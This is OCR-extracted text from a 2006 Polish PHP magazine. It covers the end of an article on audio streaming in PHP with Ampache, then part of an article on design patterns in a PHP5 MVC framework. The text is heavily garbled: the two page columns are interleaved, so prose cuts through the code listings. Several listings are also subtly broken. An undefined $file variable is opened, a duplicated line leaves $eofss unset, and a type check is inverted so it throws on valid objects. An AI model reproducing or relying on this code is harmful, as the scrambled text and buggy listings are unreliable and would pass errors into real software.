mi klientami, które zamykają połączenie na długo przed końcem piosenki. Ampache wyko-
rzystuje algorytm stosowany przez inne popularne internetowe szafy grające, który jest po-
łączeniem dwóch metod. Załóżmy, że w jakiś sposób monitorujemy użytkowników i mamy
następującą strukturę tabeli MySQL:
`id` int(11) unsigned NOT NULL auto_increment
`session` varchar(64) default NULL
`song` varchar(255) default NULL
`expire` int(11) unsigned NOT NULL default '0'
Kiedy strumień zostaje wywołany, serwer wykrywa wartość User Agent przez sprawdze-
nie globalnej $_SERVER[HTTP_USER_AGENT]. W przypadku chciwego klienta serwer ustawia
czas wygaśnięcia na time()+song_length. W innym wypadku ustawia go na time() +
86400, czyli dobę od danej chwili. Następnie sprawdzamy, czy klient jest chciwy i czy użyt-
kownik odtwarza już utwór. Jeśli spełnione są oba warunki, usuwamy poprzedni rekord.
Dotyczy to sytuacji, kiedy zostaje naciśnięty przycisk Next przed końcem utworu. ignore_
user_abort(TRUE) jest używane w przypadku uprzejmych klientów. Na samym końcu
skryptu, jeśli klient nie jest chciwy, usuwany jest wpis dodany w czasie otwarcia strumienia.
www.phpsolmag.org 25
Techniki streaming audio w PHP

plik z utworem. Jeżeli opcja PHP Safemode

ma wartość On, funkcja set_time_limit()
nie zadziała. Jedynym obejściem tego
problemu poza wyłączeniem Safemode
jest zwiększenie max_execution_time w
php.ini.
Powinniśmy również wysłać inną pa-
rę nagłówków: Accept-Ranges: i Content-
Length:. Są one potrzebne do wyszukiwa-
nia określonego miejsca w pliku. Accept_
Ranges: bytes informuje aplikację klienc-
ką, że może zażądać określonego zakre-
su bajtów pliku. Bez tego nagłówka więk-
szość odtwarzaczy nie będzie umożliwiać
wyszukiwania. Nagłówek Content-Length
pomaga aplikacji klienckiej ustalić dłu-
gość pliku.
Rysunek 2. Próba otwarcia pliku dźwiękowego w przeglądarce
Po otwarciu pliku sprawdzamy po-
czątkowy offset żądanego bajtu ($start_ simy także dodać nagłówki 206 Partial Strumieniowanie pliku
offset). Jeżeli zostanie on znalezio- Content i Content-Range – dzięki temu Możemy wreszcie rozpocząć transmi-
ny, użyjemy funkcji PHP fseek() w celu klient będzie wiedzieć, że nie otrzymuje sję strumieniową pliku. Zrobimy to w ra-
przeskoczenia do danej części pliku. Je- całego pliku oraz będzie znać początek mach pętli while, która sprawdzi począ-
żeli używana jest funkcja fseek(), mu- zawartości. tek i koniec pliku lub ewentualnie prze-
rwane połączenie, odczyta 8192 bajtów
Listing 4. Zawartość /play.php z pliku i poda dane wyjściowe za po-
mocą print(). Nasza aplikacja jest go-
<?php towa.
$dbh=mysql_connect('localhost','user','password') or die
('BŁĄD: nie można połączyć się z bazą danych');
$sql="SELECT file FROM music WHERE id='" . sql_escape($_REQUEST['song_id'])."'";
Downsampling
$db_results = mysql_query($sql, $GLOBALS['dbh']);
Skoro nasza aplikacja jest ukończo-
$results = mysql_fetch_assoc($db_results); na i działa bez zarzutu, powinniśmy wy-
$filename = $results['file']; posażyć ją w dodatkową funkcję down-
$info = pathinfo($filename); samplingu, czyli możliwość zmniejsza-
$extension = $info['extension'];
nia częstotliwości próbkowania utworu.
switch ($extension) {
case 'mp3':
Funkcja taka może być przydatna pod-
$content_type = "audio/mpeg"; break; czas przygotowywania audycji interne-
case 'ogg': towych niskiej jakości, np. w przypadku
$content_type = "application/x-ogg"; break; wolnego łącza lub gdy chcemy prezen-
case 'flac':
tować wersje demonstracyjne płatnych
$content_type = "audio/x-flac";
$extension = "ogg"; break;}
utworów.
header('Content-type: ' . $content_type . ';'); Ampache wykorzystuje LAME do ob-
header('Content-Disposition: filename=song.' . $extension); niżania częstotliwości próbkowania pli-
set_time_limit(0); ków dźwiękowych (patrz Ramka Down-
set_magic_quotes_runtime(0);
sampling za pomocą zewnętrznych pro-
$fp = @fopen($file,'r');
header('Accept-Ranges: bytes');
gramów). Ponieważ plik zostanie ponow-
header('Content-Length: ' . filesize($filename)); nie zakodowany, wyszukiwanie wyma-
$startArray = sscanf($_SERVER['HTTP_RANGE'],"bytes=%d-"); ga, abyśmy użyli dodatkowego programu
$start_offset = $startArray['0']; o nazwie mp3splt. Przeprowadzenie do-
If ($start_offset) {
wnsamplingu w locie wymaga niewielkiej
fseek($fp, $start_offset);
$range = $start_offset . '-' . $filesize . '/' . $filesize;
modyfikacji kodu z Listingu 4. Po pierw-
header('HTTP/1.1 206 Partial Content'); sze musimy ręcznie ustawić pewne zwią-
header("Content-Range: bytes=$range"); zane z utworem zmienne (skrypt nie bę-
} dzie uniwersalny, ale można go łatwo roz-
while (!feof($fp) && (connection_status() == 0)) {
budować):
$buf = fread($fp,8192);
print($buf);
} l bitrate ($song _ bitrate),
@fclose($fp); l częstotliwość próbkowania ($sample _
?> rate),
l czas trwania ($song _ time).

26 www.phpsolmag.org PHP Solutions Nr 3/2006


Dodatkowe informacje, takie jak bitrate
i długość utworu, można zebrać przy uży-
ciu biblioteki getid3().
Po wysłaniu pierwszych dwóch
nagłówków (Content-type i Content-
Disposition) obliczymy sample_ratio
na podstawie częstotliwości próbkowa-
nia oraz ustawione próbkowanie pio-
senki:
if (($sample_rate*1000)>$song_bitrate){
$sample_rate = $song_bitrate/1000;
$sample_ratio = '1';
} else {
$sample_ratio = $sample_rate/
($song_bitrate/1000);
}
Taka metoda obliczeń gwarantuje, że
częstotliwość próbkowania nie zostanie
zwiększona.
Następną modyfikację należy wpro-
wadzić po wysłaniu kolejnych dwóch
nagłówków (Accept-Ranges i Content-
Length). Zmienimy sposób obliczania of-
fsetu ($offset), biorąc pod uwagę zdefi-
niowany czas trwania ($song_time) i pro-
porcje próbkowania ($sample_ratio).
$offset = ( $start*$song_time )/
( $sample_ratio*filesize($filename));
$offsetmm = floor($offset/60);
$offsetss = floor($offset-$offsetmm*60);
$offset = sprintf("%02d.%02d",
$offsetmm,$offsetss);
Kolejny fragment kodu zajmie się pobra-
niem danych o końcu pliku (EOF) w minu-
tach I sekundach:
$eofmm = floor($song_time/60);
$eofmm = floor($song_time/60);
$eof = sprintf("%02d.%02d",$eofmm,$e
ofss);
Spróbujmy teraz przeprowadzić down-
sampling pliku za pomocą zwenętrznych
aplikacji – mp3splt i lame. Zanim zacznie-
my, oczyśćmy łańcuch z nazwą pliku, aby
zapobiec błądom lub niechcianemu wyko-
nywaniu poleceń:
$song_file = escapeshellarg($filename);
Przygotujmy polecenie dotyczące down-
samplingu:
$downsample_command = “mp3splt -qnf
$song_file $offset $eof -o - | “ .
PHP Solutions Nr 3/2006
streaming audio w PHP Techniki
Listing 5. Zawartość /play.php with downsampling
<?php
...
// podanie nagłówków w oparciu o typ pliku
header('Content-type: ' . $content_type . ';');
header('Content-Disposition: filename=song.' . $extension);
// ustawienie częstotliwości próbkowania i uniknięcie jej zwiększania
if (($sample_rate*1000) > $song_bitrate) {
$sample_rate = $song_bitrate/1000;
$sample_ratio = '1';
} else { $sample_ratio = $sample_rate/($song_bitrate/1000); }
set_time_limit(0);
set_magic_quotes_runtime(0);
// informacja dla przeglądarki, że może określić zakres bajtów
header('Accept-Ranges: bytes');
header('Content-Length: ' . $sample_ratio*filesize($filename));
// pobranie offsetu, długość utworu taka jak w $song_time
$offset = ( $start*$song_time )/( $sample_ratio*filesize($filename));
$offsetmm = floor($offset/60);
$offsetss = floor($offset-$offsetmm*60);
$offset = sprintf("%02d.%02d",$offsetmm,$offsetss);
$eofmm = floor($song_time/60);
$eofss = floor($song_time-$eofmm*60);
$eof = sprintf("%02d.%02d",$eofmm,$eofss);
$song_file = escapeshellarg($filename);
$downsample_command = "mp3splt -qnf $song_file $offset $eof -o - | ".
" lame --mp3input -q 3 -b $sample_rate -S - -";
// użycie popen, ponieważ otwieramy proces, a nie plik
$fp = @popen($downsample_command, 'r');
// Strumieniowanie pliku
while (!feof($fp) && (connection_status() == 0)) {
$buf = fread($fp,8192);
print($buf);
}
@pclose($fp);
?>
“ lame --mp3input -q 3 -b Podsumowanie
$sample_rate -S - -“; Udowodniliśmy, że do stworzenia serwera
transmisji strumieniowych wystarczy PHP,
I wykonajmy je poprzez otwarcie stru- Apache i baza danych. Te same pomysły
mienia (zastępuje to otwarcie pliku z po- można zastosować przy tworzeniu serwe-
przedniego przykładu): użyjemy popen() ra transmisji wideo. Choć nasz przykład jest
zamiast fopen(), ponieważ uruchomienie względnie prosty, zapewnia solidne wpro-
wyrażenia jest procesem, a nie plikiem: wadzenie do świata transmisji multimedial-
nych. Przykład można rozwinąć, tworząc
$fp = @popen($downsample_command, 'r'); zaawansowany portal muzyczny (z kilkoma
modyfikacjami) lub nadając audycje wideo.
Ostatnim krokiem jest rozpoczęcie trans- Niezależnie od wyboru należy pamiętać, że
misji strumieniowej, w taki sam sposób, te tajemnicze transmisje strumieniowe pole-
jak poprzednio. Po ukończeniu proces mu- gają jedynie na manipulacji nagłówkami. n
si zostać zamknięty funkcją @pclose($fp)
zamiast użytej wcześniej fclose(). To
wszystko – nasz skrypt działa bez zarzutu.
Na Listingu 5 zaprezentowano skrypt O autorze:
do transmisji strumieniowej umożliwia-
jący downsampling, pozbawiony jedynie Karl Vollmer jest głównym dewelope-
początkowych operacji na bazie danych rem i liderem projektu Ampache od roku
2003. Był także jednym z dwóch głów-
i wyboru rozszerzenia pliku (są one takie,
nych deweloperów projektu OSUOSL.
jak na Listingu 4). Kompletny kod źródło- Obecnie pracuje dla College of Forestry
wy można pobrać z naszej strony interne- na Uniwersytecie Stanowym w Oregon.
towej (http://www.phpsolmag.org).
www.phpsolmag.org 27
Techniki
Wzorce projektowe w akcji,
czyli ciąg dalszy Niezbędnika
dewelopera PHP
Piotr Szarwas
W SIECI
1. http://flexi.sourceforge.net/
– tu umieściliśmy tworzony
przez nas Framework
2. http://www.artima.com/
designtechniques/
compoinh.html – kiedy sto-
sować kompozycję, a kiedy
dziedziczenie
3. http://www.zend.com/php/
design/ – projektowanie apli-
kacji w PHP5
4. http://www.developer.com/
design/article.php/3345121
– implementacja wzorców
projektowych w PHP5
28
Czytelny i przejrzysty kod. Elastyczna
i w każdym momencie gotowa na rozbudowę
architektura. Bogata, dodawana w elegancki
sposób funkcjonalność. I w końcu najlepsze
praktyki programowania obiektowego w PHP5.
Poznaj trzy kolejne omówione w tym artykule
wzorce projektowe.
W
poprzednim artykule na przy-
kładzie prostego frameworka
MVC pokazaliśmy wam, jak
w praktyce można zaimplementować trzy
wzorce programistyczne: Strategy, Com-
posite i Decorator. Posłużyły nam one do
zbudowania klasy FrontControllerImpl,
implementującej wzorzec architektonicz-
ny FrontController.
W tym artykule zaprezentujemy wam,
jak w naszym framewroku można wyko-
rzystać wzorce Adapter, Transfer Object
i Intercepting Filter. Pokażemy, jak stosu-
jąc kompozycję i delegację można rozbu-
dować funkcjonalność klasy FrontControl-
lerImpl.
Zanim przejdziemy do omawia-
nia wspomnianych wzorców wprowa-
dzimy drobne zmiany w klasie Front-
ControllerImpl . Na Listingu 1a poka-
zana jest implementacja nowej wersji
tej klasy. Zmiany wydają się dość po-
ważne, ale są łatwe do wytłumacze-
nia.
www.phpsolmag.org
Stopień trudności: lll
Nazwane wyjątki
– dlaczego warto je
stosować
Po pierwsze dodaliśmy trochę kodu
sprawdzającego poprawność zwraca-
nych obiektów. PHP nie jest językiem
ścisłego typowania, lepiej więc się za-
bezpieczyć i sprawdzić, czy zwracane
informacje są właściwego typu. O po-
jawieniu się błędu informujemy poprzez
Co należy wiedzieć...
Powinieneś znać podstawy programo-
wania obiektowego w PHP5. Przydatna
będzie również lektura artykułu wprowa-
dzającego w tematykę wzorców projekto-
wych, który ukazał się w poprzednim nu-
merze PHP Solutions.
Co obiecujemy...
Poznasz trzy kolejne wzorce projektowe
(Adapter, Transfer Object i Intercepting
Filter) i ich praktyczne wykorzystanie w
rozbudowie naszego frameworka.
PHP Solutions Nr 3/2006

rzucanie odpowiednich wyjątków. Są to
tzw. nazwane wyjątki. Dzięki określeniu
typu każdego z wyjątków kod jest czytel-
niejszy i sam się dokumentuje. Typowa-
ne wyjątki pozwolą też na elastyczniej-
szą reakcję na błędy. W ramce Konwen-
cje kodowania możecie dodatkowo prze-
czytać, dlaczego nazwane wyjątki są ta-
kie ważne.
Request Object /
Transfer Object
Zmieniliśmy też wymagania dotyczące
metody doAction. Chcemy, aby zwró-
ciła ona obiekt klasy ModelAndView lub
wartość null. Zmiana ta nie wymaga na
szczęście zmiany interfejsu MVCAc-
tion. Teraz akcje nie będą same ren-
derować warstwy prezentacji, a jedynie
w postaci klasy ModelAndView dostar-
czać front kontrolerowi wszystkich infor-
macji potrzebnych do wyrenderowania
strony: logiczną nazwę szablonu i dane
do prezentacji. Logiczne nazwy szablo-
nów to nazwy, które nie będą przywią-
zane do żadnego mechanizmu rende-
rowania stron. Nie są to np. nazwy pli-
ków z szablonami Smarty lub PHPTAL.
W dalszej części artykułu pokażemy
wam, dlaczego tak jest i jak przekształ-
cić te informacje na obiekty, które będą
potrafiły wygenerować kod HTML. Pod-
sumowując można powiedzieć, iż kla-
sa ModelAndView jest swojego rodzaju
kontenerem. Jej implementacja znajdu-
je się na Listingu 1b. Rozszerza ona kla-
sę NameValuePairHolder, która opako-
wuje tablicę asocjacyjną, przechowują-
cą wszystkie dane przekazywane z akcji
do front kontrolera. Pełna implementacja
klasy NameValuePairHolder znajduje się
w kodzie dołączonym do artykułów. Za-
stosowanie klasy ModelAndView jest pew-
���������������
�����������
����������������
Rysunek 1. Przepływ danych pomiędzy różnymi warstwami aplikacji z wykorzystaniem
pojedynczego obiektu jako kontenera danych
PHP Solutions Nr 3/2006
Wzorce projektowe Techniki
Konwencje Kodowania
W sekcji tej chcielibyśmy pokrótce opisać konwencje kodowania, jakie będziemy sto-
sować podczas pisania wszystkich artykułów:
• Będziemy się starali, aby tam gdzie jest to możliwe, zmienne klas były prywatne,
jeżeli wymagać będzie tego architektura będą one typu protected. Z całą pewno-
ścią będziemy się starać, aby nie były one publiczne. Zmienne publiczne powodu-
ją, że kod przestaje być odporny na zmiany.
• Praktycznie w każdym miejscu jako dostępu do zmiennych klasy będziemy starali
się wykorzystywać tzw. settery i gettery (dostęp do zmiennych składowych przy
pomocy _ _ get i _ _ set). Dzięki temu kod jest bardziej odporny na zmiany.
• Konwencja nazewnictwa metod i zmiennych została zapożyczona z Javy, a do-
kładniej ze specyfikacji JavaBeansów.
• Jako podstawowy model obsługi błędów wykorzystaliśmy wyjątki. Dodatkowo
w każdym miejscu, w którym rzucany był wyjątek, nie był on generycznego ty-
pu. Wyjątki pełnią w kodzie kilka funkcji: informują o wystąpieniu błędu, swoim
typem informują o typie błędu, ich jasne nazwy pełnią funkcję dokumentacji. Tak
więc zawsze starajcie się stosować nazwane wyjątki, a nie bezpośrednio klasę
Exception.
• Wszędzie, gdzie jest to możliwe, stosujemy silne typowanie. Ogranicza to pew-
nie ograniczenie stosowalności naszego frameworka do PHP 5.0, a w niektórych
miejscach do PHP 5.1. Z naszego doświadczenia wynika jednak, że w przypadku
frameworków silne typowanie powoduje, że popełniamy mniej błędów.
nego rodzaju programistycznym trikiem. do metody doAction informacji o języ-
Stosując obiekty do wymiany danych ku. Ale to oznacza, że będziemy musie-
pomiędzy różnymi warstwami aplikacji, li zmienić implementację tej metody we
przygotowujemy kod na przyszłe zmia- wszystkich istniejących już akcjach. A te-
ny formatu komunikacji pomiędzy tymi go z całą pewnością nie chcemy, poza
warstwami, bez potrzeby zmiany inter- tym nie wszystkie akcje potrzebują ję-
fejsów komunikujących się metod. Spró- zyka do swojego poprawnego działania.
bujmy wyjaśnić to na przykładzie klasy Kolejnym pomysłem może być dodanie
HttpRequest. do interfejsu MVCAction kolejnej meto-
Klasa ta pełni podobną funkcję jak dy np. doActionWithLangSupport, w któ-
ModelAndView, czyli jest kontenerem da- rej jako drugi parametr będziemy poda-
nych przekazywanych pomiędzy war- wać język. Ale teraz pojawia się kolej-
stwami aplikacji (Rysunek 1). Wyobraź- ny problem jak w front kontrolerze pod-
cie sobie, że pojawiła się potrzeba, aby jąć decyzję, którą metodę mamy wyko-
akcje dostawały informacje o języku rzystać. Tak więc żadne z tych rozwią-
(polski, angielski, itp.), w którym zosta- zań nie jest dobre. Istnieje jednak du-
nie wygenerowana strona. Język, w ja- żo prostsze rozwiązanie – dodanie do
kim ma być wyrenderowana strona, de- klasy HttpRequest metody getLocale.
finiowany jest w front kontrolerze. Pierw- Dzięki temu Front Controller pozosta-
sze co przychodzi nam do głowy, to nie bez zmian. Interfejs MVCAction rów-
zmiana interfejsu MVCAction i dodanie nież. Dodatkowo każda akcja, która bę-
dzie do swojego działania potrzebować
języka pobierze go sobie z HttpRequest.
Z przytoczonego rozwiązania płynie pro-
sty wniosek: wszędzie, gdzie spodzie-
wacie się, że mogą pojawić się zmiany
interfejsu do przekazywania danych do
������������
metod, stosujcie obiekty lub tablice aso-
cjacyjne. Dzięki temu wasz kod będzie
bardziej odporny na zmiany.
Omawiany problem chyba nigdy nie
doczekał się swojej nazwy jako wzorzec.
My postanowiliśmy zapożyczyć nieformal-
nie nazwę z innego wzorca i ochrzcić nasz
trik nazwą Transfer Object.
www.phpsolmag.org 29
Techniki Wzorce projektowe

FrontController – jak PDF. Odpowiedzialność za odnalezie- wą implementacje dla Smarty, a Listing 4

kompozycją zwiększyć nie i wygenerowanie strony przekażemy nową wersję Front Controllera. Listing 4
jego możliwości klasom implementującym interface View. zawiera szereg klas, które nie zostały
Po drobnych zmianach, które wprowa- Za utworzenie i odnalezienie odpowied- jeszcze omówione, ale nie martwcie się
dziliśmy na Listingu 1b nasz Front Con- niego widoku odpowiedzialne będą kla- – po lekturze całego artykułu wszystko,
troller jest gotowy do dalszej przebudo- sy implementujące interfejs ViewReso- co jest na tym Listingu, powinno być zro-
wy. Zaczniemy od tego, że Front Con- lvingStrategy. Zbudowane w ten sposób zumiałe. Podział na ViewResolvingStra-
troller i akcje powinny być napisane tak, API będzie można łatwo rozszerzać do- tegy i View jest powtórką rozwiązania
by żadne z nich nie było odpowiedzialne dając kolejne klasy typu ViewResolving- zaprezentowanego w poprzednim arty-
za wyświetlenie „strony” dla użytkowni- Strategy i kolejne klasy widoków. Listing kule, tam posłużyliśmy się nim do odnaj-
ka. Poprzez stronę rozumiemy dowolną 2a prezentuje interfejsy View i ViewRe- dywania akcji. Architektura ta wydaje się
formę prezentacji HTML, XML, CSV lub solver, Listing 2b zawiera ich przykłado- nam na tyle użyteczna, że powtórzymy
ją jeszcze raz.
Listing 1a. Ulepszona klasa FrontControllerImpl Wyobraźcie sobie, że tworzycie apli-
kację, która jako jedno ze swoich wy-
magań ma możliwość działania w wielu
class FrontControllerImpl implements FrontController wersjach językowych, przy czym klient
{
nie zdefiniował, ile to będzie wersji.
private $actionResolvingStrategy;
public function __construct(ActionResolvingStrategy $actionResolvingStrategy) Klient chciałby też móc w prosty sposób
{ tworzyć kolejne wersje językowe napisa-
$this->setActionResolvingStrategy($actionResolvingStrategy); nej przez was aplikacji. Należy więc do
} naszego frameworka dodać mechanizm
public function doService(HttpRequest $request)
zarządzania internacjonalizacją aplika-
{
$actionClass = $this->getActionResolvingStrategy()->resolveAction($reques cji. Problem ten sprowadzimy do napi-
t); sania kilku klas implementujących inter-
fejs LocaleResolvingStrategy, które bę-
if ( is_null( $actionClass ) ) dą zawsze zwracać obiekty typu Loca-
{
le. Obiekty typu Locale będą przekazy-
throw new ActionDoesNotExistsException('Nie znaleziono akcji do
wykonania'); wane do innych klas, które będą umia-
}

if ( $actionClass instanceof MVCAction ) Listing 1b. Implementacja klasy

{ ModelAndView
throw new WrongReturnTypeException('Zwrócony obiekt nie jest typu
MVCAction');
} class ModelAndView extends
NameValuePairHolde
$modelAndView = $actionClass->doAction($request); {
private $template;
if ( !is_null( $modelAndView ) && !($modelAndView instanceof ModelAndView) private $view = null;
)
{ public function setView(View
throw new WrongReturnTypeException('Zwrócony obiekt nie jest typu $view)
ModelAndView'); {
} $this->view = $view;
}
return $modelAndView;
} public function getView()
{
//gettery i settery return $this->view;
}
private function getActionResolvingStrategy()
{ public function
return $this->actionResolvingStrategy; setTemplate($templateName)
} {
$this->template = $templateName;
private function setActionResolvingStrategy(ActionResolvingStrategy $actionRe }
solvingStrategy)
{ public function getTemplate()
$this->actionResolvingStrategy = $actionResolvingStrategy; {
} return $this->template;
} }

30 www.phpsolmag.org PHP Solutions Nr 3/2006

 Wzorce projektowe Techniki

ły je wykorzystać. Takim przykładem jest

Listing 2a. Interfejsy View i ViewResolver dowolna klasa typu ViewResolvingStra-
tegy, która w zależności od Locale może
interface ViewResolvingStrategy
{ zwrócić inny plik szablonu. Przykładowe
public function resolveView($viewName, Locale $locale); implementacje interfejsów LocaleReso-
} lvingStrategy i klasy Locale pokazane są
na Listingach 3a i 3b.
interface View
Tworząc szereg małych klas, któ-
{
public function render(array $data); re specjalizują się w wykonywaniu pro-
} stych pojedynczych zadań czynimy nasz
framework bardzo elastycznym i goto-
Listing 2b. Przykładowa implementacja interfejsów View i ViewResolver dla wym na rozszerzenia. Dodatkowo ma-
Smarty
łe klasy są łatwe w zrozumieniu i testo-
class SmartyViewResolvingStrategy implements ViewResolvingStrategy waniu. Klasa FrontControllerImpl wraz
{ z implementacjami różnych interfejsów
private $renderingEngine; typu ResolvingStrategy jest idealnym
private $tplPath;
przykładem na to, jak zasada kompozy-
private $tplPrefix;
private $tplSuffix;
cji obiektów może spowodować, że nie-
wielki rozmiarami kod potrafi wykonywać
public function __construct(Smarty $smartyEngine, $tplPath, $tplPrefix = '', bardzo skomplikowane zadania. Wy-
$tplSuffix = '.tpl.html') obraźcie sobie, jak trudnym byłoby na-
{
pisanie tego kodu, gdyby zawierał się
$this->setRenderingEngine($smartyEngine);
$this->setTplPath($tplPath);
on w jednej dużej klasie, taki kod były
$this->setTplPrefix($tplPrefix); najprawdopodobniej nieczytelny i trudny
$this->setTplSuffix($tplSuffix); do przetestowania. Przykład FrontCon-
} trollerImpl pokazuje, że zaawansowany
public function resolveView($viewName, Locale $locale)
w swoim działaniu kod nie musi być
{
$fileName = $this->getTplPath().'/'.$this->getTplPrefix().$viewName;
skomplikowany – wystarczy jedynie, aby
istniały złożone relacje pomiędzy prosty-
if ( $locale != null && $locale->getLang() != '' ) mi obiektami.
{ Kompozycja nie zawsze jest naj-
$fileName .= '_'.$locale->getLang();
lepszym rozwiązaniem. Podobnie jak
}
dziedziczenie, należy ją stosować
$fileName .= $this->getTplSuffix(); z rozwagą. Pojawia się więc pytanie,
$this->getRenderingEngine()->template_dir = dirname($fileName); kiedy należy stosować kompozycję
a kiedy dziedziczenie. Ciężko jest jed-
return new SmartyView($this->getRenderingEngine(), 'file:'.$fileName);
noznacznie odpowiedzieć na to pytanie,
}
szczególnie w ramach artykułu. Istnieje
pewien zestaw wskazówek, o których
// gettery i settery zostały pominięte można przeczytać pod adresem: http://
} www.artima.com/designtechniques/
class SmartyView implements View
compoinh.html.
{
private $renderingEngine = null;
private $tplFile; Adapter
Na Listingu 5a pokazana jest implemen-
public function __construct(Smarty $renderingEngine, $tplFile) tacja klasy MCacheActionResolverStrate
{
gy, którą stworzyliśmy we wcześniejszej
$this->setRenderingEngine($renderingEngine);
$this->setTplFile($tplFile);
części artykułu. Klasa ta zwraca na pod-
} stawie nazwy obiekt akcji, który został
public function render(array $data) zapisany w cache'u. Jeżeli obiekt nie zo-
{ stanie odnaleziony w cache'u, rzucany
$this->getRenderingEngine()->clear_all_assign();
jest wyjątek. Jako mechanizm cachowa-
$this->getRenderingEngine()->assign($data);
nia wykorzystany został memcache. Wy-
return $this->getRenderingEngine()->fetch($this->getTplFile()); obraźmy sobie teraz, że pojawia się na-
} gle potrzeba zaimplementowania inne-
go mechanizmu cachowania, np. znane-
// gettery i settery zostały pominięte
go chyba wszystkim CacheLite. Problem
}
ten możemy rozwiązać na kilka sposo-
bów. Najprościej byłoby skopiować kod

PHP Solutions Nr 3/2006 www.phpsolmag.org 31

Techniki Wzorce projektowe

Listing 3a. Przykładowa implementacja interfejsu Listing 4. Nowa wersja Fron Controllera. Zastosowanie
LocaleResolvingStrategy kompozycji zwiększa jego możliwości

class Locale class FrontControllerImpl implements FrontController

{ {
private $actionResolvingStrategy;
private $langCode; private $viewResolvingStrategy;
private $localeResolvingStrategy;
public function __ construct($langCode)
{ public function __construct(
$this->setLangCode($langCode); ActionResolvingStrategy $actionResolvingStrategy,
} ViewResolvingStrategy $viewResolvingStrategy,
LocaleResolvingStrategy $localeResolvingStrategy)
public function getLangCode() {
{ $this->setActionResolvingStrategy($actionResolvingS
return $this->langCode; trategy);
} $this->setViewResolvingStrategy($viewResolvingStra
tegy);
private function setLangCode($langCode) $this->setLocaleResolvingStrategy($localeResolvingS
{ trategy);
$this->langCode = $langCode; }
}
public function doService(HttpRequest $request)
} {
$result = null;
interface LocaleResolvingStrategy
{ try
public function resolveLocale(HttpRequest $request); {
} $this->filter->doPreProcessing($request);

Listing 3b. Przykładowa implementacja klasy Locale $locale = $this->getLocaleResolvingStrategy()->

resolveLocale($request);
class RequestParamLocaleResolvingStrategy
$actionClass = $this->getActionResolvingStrateg
implements LocaleResolvingStrategy y()->
{ resolveAction($request);

private $requestKey; $modelAndView = $actionClass->doAction($request);

private $defaultLangCode; $viewObj = $modelAndView->getView();

public function __construct($requestKey, if ( !($viewObj instanceof View) )

$defaultLangCode) {
{ $viewObj = $this->getViewResolvingStrategy()->
$this->setRequestKey($requestKey); resolveView($modelAndView->getTemplate(),$l
ocale);
$this->setDefaultLangCode($defaultLangCode); }
}
$result = $viewObj->render($modelAndView-
public function resolveLocale(HttpRequest $request) >getAllVariables());
{
$this->filter->doPostProcessing( $request,
$lang = $request->getVar($this->getRequestKey()); $modelAndView );

if ($lang == '') return $result;

{ }
$lang = $this->getDefaultLangCode(); catch( Exception $exception )
} {
$this->filter->doExceptionProcessing(
return new Locale( $lang ); $exception, $request, $modelAndView);
} }
}

// gettery i settery zostały pominięte // gettery i settery zostały pominięte

} }

32 www.phpsolmag.org PHP Solutions Nr 3/2006

 Wzorce projektowe Techniki

klasy MCacheActionResolverStrategy
i przystosować ją do działania z no- Listing 5a. Implementacja klasy McacheActionResolverStrategy
wym mechanizmem cachowania. Czyn-
class MCacheActionResolverStrategy implements ActionResolvingStrategy
ność tę można powtarzać dalej, tzn. {
w momencie, gdy będziemy chcieli do- private $_actionRequestParamName;
dać kolejny mechanizm cachowania private $_memcache;
ponownie skopiujemy kod i utworzy-
public function __construct($actionRequestParamName, $memcacheHost,
my kolejną klasę implementującą in-
$memcachePort)
terfejs ActionResolverStrategy. I w tym {
momencie w naszych głowach powin- $this->_actionRequestParamName = $actionRequestParamName;
no zapalić się czerwone światełko, pod $this->_memcache = new Memcache();
którym powinien migać napis Czy aby $this->_memcache->connect($memcacheHost, $memcachePort);
}
to najprostsze rozwiązanie jest najlep-
sze. Naszym zdaniem nie. public function resolveAction(HttpRequest $request)
Za każdym razem, gdy w waszym {
kodzie pojawia się potrzeba skopiowa- $actionName = $request->getParam($this->_actionRequestParamName);
nia kodu, powinniście się dobrze zasta-
if ($actionName != '')
nowić, czy nie można tak zmienić kodu,
{
aby go nie powtarzać. Zduplikowany kod return $this->_memcache->get($actionName);
jest jednym z największych wrogów każ- }
dego programisty. Jak więc rozwiązać else
ten problem? Najlepiej byłoby uniezależ- {
throw new RuntimeException('Nie wyspecyfikowano akcji do wywołania!');
nić się od implementacji jakiegokolwiek
}
mechanizmu cachowania obiektów. Po- }
służy nam do tego wzorzec Adapter. Kod
naszego frameworka będzie zależny je- }
dynie od interfejsu CacheService imple-
Listing 5b. Klasa CacheActionResolverStrategy, która może pobierać obiekty z
mentowanego przez klasy, za którymi
dowolnego mechanizmu cachującego implementującego interfejs CacheService
ukryta będzie obsługa mechanizmów ca- interface CacheService
chowania. Na Listing 5b prezentuje kla-
se CacheActionResolverStrategy, która {
public function set($key,$data);
może pobierać obiekty z dowolnego me-
public function get($key);
chanizmu cachującego implementujące-
public function remove($key);
go interfejs CacheService. Aby cacho- public function exists($key);
wanie ponownie zadziałało, potrzebuje- }
my teraz jedynie adapterów, które będą class CacheActionResolverStrategy implements ActionResolvingStrategy
{
delegować działanie do Memcacha i Ca-
private $actionRequestKey;
cheLita. Listing 5c pokazuje implementa-
private $cacheService;
cję Adaptera dla CacheLite.
Dzięki oddzieleniu API mechani- public function __construct($actionRequestKey, CacheService $cacheService)
zmów cachujących od klas ActionRe- {
$this->setActionRequestKey($actionRequestKey);
soverów udało się stworzyć mechanizm
$this->setCacheService($cacheService);
cachowania wspólny dla całego frame-
}
worka. Teraz w dowolnym miejscu, w public function resolveAction(HttpRequest $request)
którym będzie potrzebne cachowanie {
obiektów, wystarczy, że będziemy wy- $actionName = $request->getVar($this->getActionRequestKey());
magać klasy implementującej interfejs
if ($this->getCacheService()->exists($actionName))
CacheService.
{
Drugim przykładem wykorzystania return $this->getCacheService()->get($actionName);
wzorca Adapter jest interfejs View opi- }
sany powyżej. W środowisku PHP istnie- else
{
je kilka szablonów renderujących strony.
throw new ObjectDoesnotExistsInCacheException(
Najbardziej znany to oczywiście Smar-
'Nie wyspecyfikowano akcji do wywołania!');
ty, ale sporo zwolenników ma też PHP- }
TAL. Ponadto, pamiętajmy, że dane, któ- }
re przesyłamy do użytkowników, nie za-
// gettery i settery zostały pominięte
wsze muszą mieć postać stron HTML,
}
czasami mogą to być pliki CSV, XML, a
nawet PDF-y. Nie jesteśmy więc w sta-

PHP Solutions Nr 3/2006 www.phpsolmag.org 33

Techniki Wzorce projektowe

�������������� ������������ ���������������������� ������������������� ���������������������

����������������

��������������� ��
������

��������������� ��
���������

����������

�������������

������������� ��
����

���������

�������������������

Rysunek 2. Diagram sekwencji dla klasy FrontControllerImpl z Listingu 4

nie wybrać jednego mechanizmu ren-

